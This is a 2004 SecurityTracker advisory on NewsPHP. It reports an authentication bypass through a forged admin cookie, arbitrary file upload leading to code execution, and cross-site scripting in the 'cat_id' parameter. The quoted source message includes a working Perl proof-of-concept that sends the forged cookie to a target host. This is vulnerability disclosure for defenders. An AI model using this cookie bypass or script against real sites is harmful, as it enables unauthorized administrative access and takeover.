SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   NewsPHP (newsphp.com) Vendors:   NewsPHP.com
NewsPHP Authentication Flaw Lets Remote Users Gain Administrative Access
SecurityTracker Alert ID:  1009740
SecurityTracker URL:  http://securitytracker.com/id/1009740
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 12 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  

Description:   Manuel Lopez reported several vulnerabilities in NewsPHP. A remote user can gain administrative access on the application. A remote authenticated administrator can upload arbitrary files. Cross-site scripting attacks are also possible.

It is reported that the software does not properly validate user-supplied cookies to authenticate administrative users. A remote user can reportedly supply the following cookie to gain administrative access:

autorized=admin; root=admin

A demonstration exploit script is provided in the Source Message.

It is also reported that a remote authenticated administrator (or a remote user that has exploited the above described authentication vulnerability) can invoke the File Upload feature to upload arbitrary files instead of video files. The remote user can then load a URL to cause the uploaded file to be executed by the web server with the privileges of the web server.

It is also reported that the software does not properly filter HTML code from user-supplied input in the 'cat_id' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the NewsPHP software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

/index.php?cat_id=[XSS]

The vendor was reportedly notified on April 3, 2004.

Impact:   A remote user can gain administrative access on the application.

A remote authenticated administrator can upload arbitrary files to the target system and execute them with the privileges of the web server.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the NewsPHP software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.newsphp.com/ (Links to External Site)
Cause:   Access control error, Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Apr 16 2004 (Vendor Issues Fix) NewsPHP Authentication Flaw Lets Remote Users Gain Administrative Access
A fix is reportedly available.



 Source Message Contents

Subject:  XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP.


#Title: XSS, Admin Access via Cookie and File Upload vulnerability in
NewsPHP.

#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All


#Description:

NewsPHP is a perfect solution for creating web publishing system, like an
online magazine, newspaper, TV/Radio or news portals. It works also as a
Content Management System that is easy to install and manage without having
to FTP upload your pages every time you need to update it.


#Vulnerabilities:

A security vulnerability in the product allows attackers to cause the
product to think they are administrators by placing a fake Administrator
cookie on their computer.

A File Upload vulnerability in the Admin panel allow authenticated users
upload arbitrary files instead of a video file.

This product also is vulnerable to the Cross-Site Scripting vulnerability.


#Cookie Vulnerability#

The flaw is caused because cookie data is not properly checked for
administrator rights.

This is the cookie and POC to gain administrator privileges in newsPHP:

### autorized=admin; root=admin ###


## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)
{
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "By: Manuel Lopez mantra at gulo.org\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

##--------------------------

#Cross-Site Scripting#

A remote user can conduct cross-site scripting attacks due to an input
validation flaw in cat_id variable.

/index.php?cat_id=[XSS]


#File Upload vulnerability#

An user with privileges can upload executable code instead of a video in the
Administration Panel. Once the code has been uploaded an user can execute
the code by calling the file, this will be executed with the privileges of
the web server.


#Solution:

There is no solution at the moment.
Vendor contacted Apr 3 2004

#Credits:

Manuel Lopez, mantra@gulo.org


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC